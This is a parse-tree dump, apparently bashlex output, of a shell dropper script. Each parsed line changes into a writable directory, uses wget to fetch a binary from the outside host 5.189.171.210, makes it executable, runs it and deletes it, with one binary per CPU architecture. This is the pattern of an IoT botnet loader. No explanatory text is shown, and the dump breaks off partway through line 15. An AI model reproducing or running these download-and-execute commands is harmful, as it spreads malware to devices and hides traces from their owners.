ListNode(lineno=2, pos=(12, 141), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 99), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 99), word='http://5.189.171.210/marcms'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(99, 100)),
  CommandNode(lineno=2, pos=(101, 116), parts=[
    WordNode(lineno=2, pos=(101, 106), word='chmod'),
    WordNode(lineno=2, pos=(107, 109), word='+x'),
    WordNode(lineno=2, pos=(110, 116), word='marcms'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(116, 117)),
  CommandNode(lineno=2, pos=(118, 126), parts=[
    WordNode(lineno=2, pos=(118, 126), word='./marcms'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(126, 127)),
  CommandNode(lineno=2, pos=(128, 141), parts=[
    WordNode(lineno=2, pos=(128, 130), word='rm'),
    WordNode(lineno=2, pos=(131, 134), word='-rf'),
    WordNode(lineno=2, pos=(135, 141), word='marcms'),
  ]),
])
ListNode(lineno=3, pos=(142, 271), parts=[
  CommandNode(lineno=3, pos=(142, 149), parts=[
    WordNode(lineno=3, pos=(142, 144), word='cd'),
    WordNode(lineno=3, pos=(145, 149), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(150, 152)),
  CommandNode(lineno=3, pos=(153, 164), parts=[
    WordNode(lineno=3, pos=(153, 155), word='cd'),
    WordNode(lineno=3, pos=(156, 164), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(165, 167)),
  CommandNode(lineno=3, pos=(168, 175), parts=[
    WordNode(lineno=3, pos=(168, 170), word='cd'),
    WordNode(lineno=3, pos=(171, 175), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(176, 178)),
  CommandNode(lineno=3, pos=(179, 187), parts=[
    WordNode(lineno=3, pos=(179, 181), word='cd'),
    WordNode(lineno=3, pos=(182, 187), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(188, 190)),
  CommandNode(lineno=3, pos=(191, 195), parts=[
    WordNode(lineno=3, pos=(191, 193), word='cd'),
    WordNode(lineno=3, pos=(194, 195), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(195, 196)),
  CommandNode(lineno=3, pos=(197, 229), parts=[
    WordNode(lineno=3, pos=(197, 201), word='wget'),
    WordNode(lineno=3, pos=(202, 229), word='http://5.189.171.210/marcml'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(229, 230)),
  CommandNode(lineno=3, pos=(231, 246), parts=[
    WordNode(lineno=3, pos=(231, 236), word='chmod'),
    WordNode(lineno=3, pos=(237, 239), word='+x'),
    WordNode(lineno=3, pos=(240, 246), word='marcml'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(246, 247)),
  CommandNode(lineno=3, pos=(248, 256), parts=[
    WordNode(lineno=3, pos=(248, 256), word='./marcml'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(256, 257)),
  CommandNode(lineno=3, pos=(258, 271), parts=[
    WordNode(lineno=3, pos=(258, 260), word='rm'),
    WordNode(lineno=3, pos=(261, 264), word='-rf'),
    WordNode(lineno=3, pos=(265, 271), word='marcml'),
  ]),
])
ListNode(lineno=4, pos=(272, 401), parts=[
  CommandNode(lineno=4, pos=(272, 279), parts=[
    WordNode(lineno=4, pos=(272, 274), word='cd'),
    WordNode(lineno=4, pos=(275, 279), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(280, 282)),
  CommandNode(lineno=4, pos=(283, 294), parts=[
    WordNode(lineno=4, pos=(283, 285), word='cd'),
    WordNode(lineno=4, pos=(286, 294), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(295, 297)),
  CommandNode(lineno=4, pos=(298, 305), parts=[
    WordNode(lineno=4, pos=(298, 300), word='cd'),
    WordNode(lineno=4, pos=(301, 305), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(306, 308)),
  CommandNode(lineno=4, pos=(309, 317), parts=[
    WordNode(lineno=4, pos=(309, 311), word='cd'),
    WordNode(lineno=4, pos=(312, 317), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(318, 320)),
  CommandNode(lineno=4, pos=(321, 325), parts=[
    WordNode(lineno=4, pos=(321, 323), word='cd'),
    WordNode(lineno=4, pos=(324, 325), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(325, 326)),
  CommandNode(lineno=4, pos=(327, 359), parts=[
    WordNode(lineno=4, pos=(327, 331), word='wget'),
    WordNode(lineno=4, pos=(332, 359), word='http://5.189.171.210/marc4t'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(359, 360)),
  CommandNode(lineno=4, pos=(361, 376), parts=[
    WordNode(lineno=4, pos=(361, 366), word='chmod'),
    WordNode(lineno=4, pos=(367, 369), word='+x'),
    WordNode(lineno=4, pos=(370, 376), word='marc4t'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(376, 377)),
  CommandNode(lineno=4, pos=(378, 386), parts=[
    WordNode(lineno=4, pos=(378, 386), word='./marc4t'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(386, 387)),
  CommandNode(lineno=4, pos=(388, 401), parts=[
    WordNode(lineno=4, pos=(388, 390), word='rm'),
    WordNode(lineno=4, pos=(391, 394), word='-rf'),
    WordNode(lineno=4, pos=(395, 401), word='marc4t'),
  ]),
])
ListNode(lineno=5, pos=(402, 531), parts=[
  CommandNode(lineno=5, pos=(402, 409), parts=[
    WordNode(lineno=5, pos=(402, 404), word='cd'),
    WordNode(lineno=5, pos=(405, 409), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(410, 412)),
  CommandNode(lineno=5, pos=(413, 424), parts=[
    WordNode(lineno=5, pos=(413, 415), word='cd'),
    WordNode(lineno=5, pos=(416, 424), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(425, 427)),
  CommandNode(lineno=5, pos=(428, 435), parts=[
    WordNode(lineno=5, pos=(428, 430), word='cd'),
    WordNode(lineno=5, pos=(431, 435), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(436, 438)),
  CommandNode(lineno=5, pos=(439, 447), parts=[
    WordNode(lineno=5, pos=(439, 441), word='cd'),
    WordNode(lineno=5, pos=(442, 447), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(448, 450)),
  CommandNode(lineno=5, pos=(451, 455), parts=[
    WordNode(lineno=5, pos=(451, 453), word='cd'),
    WordNode(lineno=5, pos=(454, 455), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(455, 456)),
  CommandNode(lineno=5, pos=(457, 489), parts=[
    WordNode(lineno=5, pos=(457, 461), word='wget'),
    WordNode(lineno=5, pos=(462, 489), word='http://5.189.171.210/marc4l'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(489, 490)),
  CommandNode(lineno=5, pos=(491, 506), parts=[
    WordNode(lineno=5, pos=(491, 496), word='chmod'),
    WordNode(lineno=5, pos=(497, 499), word='+x'),
    WordNode(lineno=5, pos=(500, 506), word='marc4l'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(506, 507)),
  CommandNode(lineno=5, pos=(508, 516), parts=[
    WordNode(lineno=5, pos=(508, 516), word='./marc4l'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(516, 517)),
  CommandNode(lineno=5, pos=(518, 531), parts=[
    WordNode(lineno=5, pos=(518, 520), word='rm'),
    WordNode(lineno=5, pos=(521, 524), word='-rf'),
    WordNode(lineno=5, pos=(525, 531), word='marc4l'),
  ]),
])
ListNode(lineno=6, pos=(532, 661), parts=[
  CommandNode(lineno=6, pos=(532, 539), parts=[
    WordNode(lineno=6, pos=(532, 534), word='cd'),
    WordNode(lineno=6, pos=(535, 539), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(540, 542)),
  CommandNode(lineno=6, pos=(543, 554), parts=[
    WordNode(lineno=6, pos=(543, 545), word='cd'),
    WordNode(lineno=6, pos=(546, 554), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(555, 557)),
  CommandNode(lineno=6, pos=(558, 565), parts=[
    WordNode(lineno=6, pos=(558, 560), word='cd'),
    WordNode(lineno=6, pos=(561, 565), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(566, 568)),
  CommandNode(lineno=6, pos=(569, 577), parts=[
    WordNode(lineno=6, pos=(569, 571), word='cd'),
    WordNode(lineno=6, pos=(572, 577), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(578, 580)),
  CommandNode(lineno=6, pos=(581, 585), parts=[
    WordNode(lineno=6, pos=(581, 583), word='cd'),
    WordNode(lineno=6, pos=(584, 585), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(585, 586)),
  CommandNode(lineno=6, pos=(587, 619), parts=[
    WordNode(lineno=6, pos=(587, 591), word='wget'),
    WordNode(lineno=6, pos=(592, 619), word='http://5.189.171.210/marc5l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(619, 620)),
  CommandNode(lineno=6, pos=(621, 636), parts=[
    WordNode(lineno=6, pos=(621, 626), word='chmod'),
    WordNode(lineno=6, pos=(627, 629), word='+x'),
    WordNode(lineno=6, pos=(630, 636), word='marc5l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(636, 637)),
  CommandNode(lineno=6, pos=(638, 646), parts=[
    WordNode(lineno=6, pos=(638, 646), word='./marc5l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(646, 647)),
  CommandNode(lineno=6, pos=(648, 661), parts=[
    WordNode(lineno=6, pos=(648, 650), word='rm'),
    WordNode(lineno=6, pos=(651, 654), word='-rf'),
    WordNode(lineno=6, pos=(655, 661), word='marc5l'),
  ]),
])
ListNode(lineno=7, pos=(662, 791), parts=[
  CommandNode(lineno=7, pos=(662, 669), parts=[
    WordNode(lineno=7, pos=(662, 664), word='cd'),
    WordNode(lineno=7, pos=(665, 669), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(670, 672)),
  CommandNode(lineno=7, pos=(673, 684), parts=[
    WordNode(lineno=7, pos=(673, 675), word='cd'),
    WordNode(lineno=7, pos=(676, 684), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(685, 687)),
  CommandNode(lineno=7, pos=(688, 695), parts=[
    WordNode(lineno=7, pos=(688, 690), word='cd'),
    WordNode(lineno=7, pos=(691, 695), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(696, 698)),
  CommandNode(lineno=7, pos=(699, 707), parts=[
    WordNode(lineno=7, pos=(699, 701), word='cd'),
    WordNode(lineno=7, pos=(702, 707), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(708, 710)),
  CommandNode(lineno=7, pos=(711, 715), parts=[
    WordNode(lineno=7, pos=(711, 713), word='cd'),
    WordNode(lineno=7, pos=(714, 715), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(715, 716)),
  CommandNode(lineno=7, pos=(717, 749), parts=[
    WordNode(lineno=7, pos=(717, 721), word='wget'),
    WordNode(lineno=7, pos=(722, 749), word='http://5.189.171.210/marc6l'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(749, 750)),
  CommandNode(lineno=7, pos=(751, 766), parts=[
    WordNode(lineno=7, pos=(751, 756), word='chmod'),
    WordNode(lineno=7, pos=(757, 759), word='+x'),
    WordNode(lineno=7, pos=(760, 766), word='marc6l'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(766, 767)),
  CommandNode(lineno=7, pos=(768, 776), parts=[
    WordNode(lineno=7, pos=(768, 776), word='./marc6l'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(776, 777)),
  CommandNode(lineno=7, pos=(778, 791), parts=[
    WordNode(lineno=7, pos=(778, 780), word='rm'),
    WordNode(lineno=7, pos=(781, 784), word='-rf'),
    WordNode(lineno=7, pos=(785, 791), word='marc6l'),
  ]),
])
ListNode(lineno=8, pos=(792, 921), parts=[
  CommandNode(lineno=8, pos=(792, 799), parts=[
    WordNode(lineno=8, pos=(792, 794), word='cd'),
    WordNode(lineno=8, pos=(795, 799), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(800, 802)),
  CommandNode(lineno=8, pos=(803, 814), parts=[
    WordNode(lineno=8, pos=(803, 805), word='cd'),
    WordNode(lineno=8, pos=(806, 814), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(815, 817)),
  CommandNode(lineno=8, pos=(818, 825), parts=[
    WordNode(lineno=8, pos=(818, 820), word='cd'),
    WordNode(lineno=8, pos=(821, 825), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(826, 828)),
  CommandNode(lineno=8, pos=(829, 837), parts=[
    WordNode(lineno=8, pos=(829, 831), word='cd'),
    WordNode(lineno=8, pos=(832, 837), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(838, 840)),
  CommandNode(lineno=8, pos=(841, 845), parts=[
    WordNode(lineno=8, pos=(841, 843), word='cd'),
    WordNode(lineno=8, pos=(844, 845), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(845, 846)),
  CommandNode(lineno=8, pos=(847, 879), parts=[
    WordNode(lineno=8, pos=(847, 851), word='wget'),
    WordNode(lineno=8, pos=(852, 879), word='http://5.189.171.210/marc7l'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(879, 880)),
  CommandNode(lineno=8, pos=(881, 896), parts=[
    WordNode(lineno=8, pos=(881, 886), word='chmod'),
    WordNode(lineno=8, pos=(887, 889), word='+x'),
    WordNode(lineno=8, pos=(890, 896), word='marc7l'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(896, 897)),
  CommandNode(lineno=8, pos=(898, 906), parts=[
    WordNode(lineno=8, pos=(898, 906), word='./marc7l'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(906, 907)),
  CommandNode(lineno=8, pos=(908, 921), parts=[
    WordNode(lineno=8, pos=(908, 910), word='rm'),
    WordNode(lineno=8, pos=(911, 914), word='-rf'),
    WordNode(lineno=8, pos=(915, 921), word='marc7l'),
  ]),
])
ListNode(lineno=9, pos=(922, 1051), parts=[
  CommandNode(lineno=9, pos=(922, 929), parts=[
    WordNode(lineno=9, pos=(922, 924), word='cd'),
    WordNode(lineno=9, pos=(925, 929), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(930, 932)),
  CommandNode(lineno=9, pos=(933, 944), parts=[
    WordNode(lineno=9, pos=(933, 935), word='cd'),
    WordNode(lineno=9, pos=(936, 944), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(945, 947)),
  CommandNode(lineno=9, pos=(948, 955), parts=[
    WordNode(lineno=9, pos=(948, 950), word='cd'),
    WordNode(lineno=9, pos=(951, 955), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(956, 958)),
  CommandNode(lineno=9, pos=(959, 967), parts=[
    WordNode(lineno=9, pos=(959, 961), word='cd'),
    WordNode(lineno=9, pos=(962, 967), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(968, 970)),
  CommandNode(lineno=9, pos=(971, 975), parts=[
    WordNode(lineno=9, pos=(971, 973), word='cd'),
    WordNode(lineno=9, pos=(974, 975), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(975, 976)),
  CommandNode(lineno=9, pos=(977, 1009), parts=[
    WordNode(lineno=9, pos=(977, 981), word='wget'),
    WordNode(lineno=9, pos=(982, 1009), word='http://5.189.171.210/marcsh'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1009, 1010)),
  CommandNode(lineno=9, pos=(1011, 1026), parts=[
    WordNode(lineno=9, pos=(1011, 1016), word='chmod'),
    WordNode(lineno=9, pos=(1017, 1019), word='+x'),
    WordNode(lineno=9, pos=(1020, 1026), word='marcsh'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1026, 1027)),
  CommandNode(lineno=9, pos=(1028, 1036), parts=[
    WordNode(lineno=9, pos=(1028, 1036), word='./marcsh'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1036, 1037)),
  CommandNode(lineno=9, pos=(1038, 1051), parts=[
    WordNode(lineno=9, pos=(1038, 1040), word='rm'),
    WordNode(lineno=9, pos=(1041, 1044), word='-rf'),
    WordNode(lineno=9, pos=(1045, 1051), word='marcsh'),
  ]),
])
ListNode(lineno=10, pos=(1052, 1181), parts=[
  CommandNode(lineno=10, pos=(1052, 1059), parts=[
    WordNode(lineno=10, pos=(1052, 1054), word='cd'),
    WordNode(lineno=10, pos=(1055, 1059), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1060, 1062)),
  CommandNode(lineno=10, pos=(1063, 1074), parts=[
    WordNode(lineno=10, pos=(1063, 1065), word='cd'),
    WordNode(lineno=10, pos=(1066, 1074), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1075, 1077)),
  CommandNode(lineno=10, pos=(1078, 1085), parts=[
    WordNode(lineno=10, pos=(1078, 1080), word='cd'),
    WordNode(lineno=10, pos=(1081, 1085), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1086, 1088)),
  CommandNode(lineno=10, pos=(1089, 1097), parts=[
    WordNode(lineno=10, pos=(1089, 1091), word='cd'),
    WordNode(lineno=10, pos=(1092, 1097), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1098, 1100)),
  CommandNode(lineno=10, pos=(1101, 1105), parts=[
    WordNode(lineno=10, pos=(1101, 1103), word='cd'),
    WordNode(lineno=10, pos=(1104, 1105), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1105, 1106)),
  CommandNode(lineno=10, pos=(1107, 1139), parts=[
    WordNode(lineno=10, pos=(1107, 1111), word='wget'),
    WordNode(lineno=10, pos=(1112, 1139), word='http://5.189.171.210/marcpc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1139, 1140)),
  CommandNode(lineno=10, pos=(1141, 1156), parts=[
    WordNode(lineno=10, pos=(1141, 1146), word='chmod'),
    WordNode(lineno=10, pos=(1147, 1149), word='+x'),
    WordNode(lineno=10, pos=(1150, 1156), word='marcpc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1156, 1157)),
  CommandNode(lineno=10, pos=(1158, 1166), parts=[
    WordNode(lineno=10, pos=(1158, 1166), word='./marcpc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1166, 1167)),
  CommandNode(lineno=10, pos=(1168, 1181), parts=[
    WordNode(lineno=10, pos=(1168, 1170), word='rm'),
    WordNode(lineno=10, pos=(1171, 1174), word='-rf'),
    WordNode(lineno=10, pos=(1175, 1181), word='marcpc'),
  ]),
])
ListNode(lineno=11, pos=(1182, 1315), parts=[
  CommandNode(lineno=11, pos=(1182, 1189), parts=[
    WordNode(lineno=11, pos=(1182, 1184), word='cd'),
    WordNode(lineno=11, pos=(1185, 1189), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1190, 1192)),
  CommandNode(lineno=11, pos=(1193, 1204), parts=[
    WordNode(lineno=11, pos=(1193, 1195), word='cd'),
    WordNode(lineno=11, pos=(1196, 1204), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1205, 1207)),
  CommandNode(lineno=11, pos=(1208, 1215), parts=[
    WordNode(lineno=11, pos=(1208, 1210), word='cd'),
    WordNode(lineno=11, pos=(1211, 1215), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1216, 1218)),
  CommandNode(lineno=11, pos=(1219, 1227), parts=[
    WordNode(lineno=11, pos=(1219, 1221), word='cd'),
    WordNode(lineno=11, pos=(1222, 1227), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1228, 1230)),
  CommandNode(lineno=11, pos=(1231, 1235), parts=[
    WordNode(lineno=11, pos=(1231, 1233), word='cd'),
    WordNode(lineno=11, pos=(1234, 1235), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1235, 1236)),
  CommandNode(lineno=11, pos=(1237, 1270), parts=[
    WordNode(lineno=11, pos=(1237, 1241), word='wget'),
    WordNode(lineno=11, pos=(1242, 1270), word='http://5.189.171.210/marc440'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1270, 1271)),
  CommandNode(lineno=11, pos=(1272, 1288), parts=[
    WordNode(lineno=11, pos=(1272, 1277), word='chmod'),
    WordNode(lineno=11, pos=(1278, 1280), word='+x'),
    WordNode(lineno=11, pos=(1281, 1288), word='marc440'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1288, 1289)),
  CommandNode(lineno=11, pos=(1290, 1299), parts=[
    WordNode(lineno=11, pos=(1290, 1299), word='./marc440'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1299, 1300)),
  CommandNode(lineno=11, pos=(1301, 1315), parts=[
    WordNode(lineno=11, pos=(1301, 1303), word='rm'),
    WordNode(lineno=11, pos=(1304, 1307), word='-rf'),
    WordNode(lineno=11, pos=(1308, 1315), word='marc440'),
  ]),
])
ListNode(lineno=12, pos=(1316, 1449), parts=[
  CommandNode(lineno=12, pos=(1316, 1323), parts=[
    WordNode(lineno=12, pos=(1316, 1318), word='cd'),
    WordNode(lineno=12, pos=(1319, 1323), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1324, 1326)),
  CommandNode(lineno=12, pos=(1327, 1338), parts=[
    WordNode(lineno=12, pos=(1327, 1329), word='cd'),
    WordNode(lineno=12, pos=(1330, 1338), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1339, 1341)),
  CommandNode(lineno=12, pos=(1342, 1349), parts=[
    WordNode(lineno=12, pos=(1342, 1344), word='cd'),
    WordNode(lineno=12, pos=(1345, 1349), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1350, 1352)),
  CommandNode(lineno=12, pos=(1353, 1361), parts=[
    WordNode(lineno=12, pos=(1353, 1355), word='cd'),
    WordNode(lineno=12, pos=(1356, 1361), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1362, 1364)),
  CommandNode(lineno=12, pos=(1365, 1369), parts=[
    WordNode(lineno=12, pos=(1365, 1367), word='cd'),
    WordNode(lineno=12, pos=(1368, 1369), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1369, 1370)),
  CommandNode(lineno=12, pos=(1371, 1404), parts=[
    WordNode(lineno=12, pos=(1371, 1375), word='wget'),
    WordNode(lineno=12, pos=(1376, 1404), word='http://5.189.171.210/marcm68'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1404, 1405)),
  CommandNode(lineno=12, pos=(1406, 1422), parts=[
    WordNode(lineno=12, pos=(1406, 1411), word='chmod'),
    WordNode(lineno=12, pos=(1412, 1414), word='+x'),
    WordNode(lineno=12, pos=(1415, 1422), word='marcm68'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1422, 1423)),
  CommandNode(lineno=12, pos=(1424, 1433), parts=[
    WordNode(lineno=12, pos=(1424, 1433), word='./marcm68'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1433, 1434)),
  CommandNode(lineno=12, pos=(1435, 1449), parts=[
    WordNode(lineno=12, pos=(1435, 1437), word='rm'),
    WordNode(lineno=12, pos=(1438, 1441), word='-rf'),
    WordNode(lineno=12, pos=(1442, 1449), word='marcm68'),
  ]),
])
ListNode(lineno=13, pos=(1450, 1587), parts=[
  CommandNode(lineno=13, pos=(1450, 1457), parts=[
    WordNode(lineno=13, pos=(1450, 1452), word='cd'),
    WordNode(lineno=13, pos=(1453, 1457), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1458, 1460)),
  CommandNode(lineno=13, pos=(1461, 1472), parts=[
    WordNode(lineno=13, pos=(1461, 1463), word='cd'),
    WordNode(lineno=13, pos=(1464, 1472), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1473, 1475)),
  CommandNode(lineno=13, pos=(1476, 1483), parts=[
    WordNode(lineno=13, pos=(1476, 1478), word='cd'),
    WordNode(lineno=13, pos=(1479, 1483), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1484, 1486)),
  CommandNode(lineno=13, pos=(1487, 1495), parts=[
    WordNode(lineno=13, pos=(1487, 1489), word='cd'),
    WordNode(lineno=13, pos=(1490, 1495), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1496, 1498)),
  CommandNode(lineno=13, pos=(1499, 1503), parts=[
    WordNode(lineno=13, pos=(1499, 1501), word='cd'),
    WordNode(lineno=13, pos=(1502, 1503), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1503, 1504)),
  CommandNode(lineno=13, pos=(1505, 1539), parts=[
    WordNode(lineno=13, pos=(1505, 1509), word='wget'),
    WordNode(lineno=13, pos=(1510, 1539), word='http://5.189.171.210/marcsprc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1539, 1540)),
  CommandNode(lineno=13, pos=(1541, 1558), parts=[
    WordNode(lineno=13, pos=(1541, 1546), word='chmod'),
    WordNode(lineno=13, pos=(1547, 1549), word='+x'),
    WordNode(lineno=13, pos=(1550, 1558), word='marcsprc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1558, 1559)),
  CommandNode(lineno=13, pos=(1560, 1570), parts=[
    WordNode(lineno=13, pos=(1560, 1570), word='./marcsprc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1570, 1571)),
  CommandNode(lineno=13, pos=(1572, 1587), parts=[
    WordNode(lineno=13, pos=(1572, 1574), word='rm'),
    WordNode(lineno=13, pos=(1575, 1578), word='-rf'),
    WordNode(lineno=13, pos=(1579, 1587), word='marcsprc'),
  ]),
])
ListNode(lineno=14, pos=(1588, 1717), parts=[
  CommandNode(lineno=14, pos=(1588, 1595), parts=[
    WordNode(lineno=14, pos=(1588, 1590), word='cd'),
    WordNode(lineno=14, pos=(1591, 1595), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1596, 1598)),
  CommandNode(lineno=14, pos=(1599, 1610), parts=[
    WordNode(lineno=14, pos=(1599, 1601), word='cd'),
    WordNode(lineno=14, pos=(1602, 1610), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1611, 1613)),
  CommandNode(lineno=14, pos=(1614, 1621), parts=[
    WordNode(lineno=14, pos=(1614, 1616), word='cd'),
    WordNode(lineno=14, pos=(1617, 1621), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1622, 1624)),
  CommandNode(lineno=14, pos=(1625, 1633), parts=[
    WordNode(lineno=14, pos=(1625, 1627), word='cd'),
    WordNode(lineno=14, pos=(1628, 1633), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1634, 1636)),
  CommandNode(lineno=14, pos=(1637, 1641), parts=[
    WordNode(lineno=14, pos=(1637, 1639), word='cd'),
    WordNode(lineno=14, pos=(1640, 1641), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1641, 1642)),
  CommandNode(lineno=14, pos=(1643, 1675), parts=[
    WordNode(lineno=14, pos=(1643, 1647), word='wget'),
    WordNode(lineno=14, pos=(1648, 1675), word='http://5.189.171.210/marc32'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1675, 1676)),
  CommandNode(lineno=14, pos=(1677, 1692), parts=[
    WordNode(lineno=14, pos=(1677, 1682), word='chmod'),
    WordNode(lineno=14, pos=(1683, 1685), word='+x'),
    WordNode(lineno=14, pos=(1686, 1692), word='marc32'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1692, 1693)),
  CommandNode(lineno=14, pos=(1694, 1702), parts=[
    WordNode(lineno=14, pos=(1694, 1702), word='./marc32'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1702, 1703)),
  CommandNode(lineno=14, pos=(1704, 1717), parts=[
    WordNode(lineno=14, pos=(1704, 1706), word='rm'),
    WordNode(lineno=14, pos=(1707, 1710), word='-rf'),
    WordNode(lineno=14, pos=(1711, 1717), word='marc32'),
  ]),
])
ListNode(lineno=15, pos=(1718, 1847), parts=[
  CommandNode(lineno=15, pos=(1718, 1725), parts=[
    WordNode(lineno=15, pos=(1718, 1720), word='cd'),
    WordNode(lineno=15, pos=(1721, 1725), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1726, 1728)),
  CommandNode(lineno=15, pos=(1729, 1740), parts=[
    WordNode(lineno=15, pos=(1729, 1731), word='cd'),
    WordNode(lineno=15, pos=(1732, 1740), word='/var/run'),
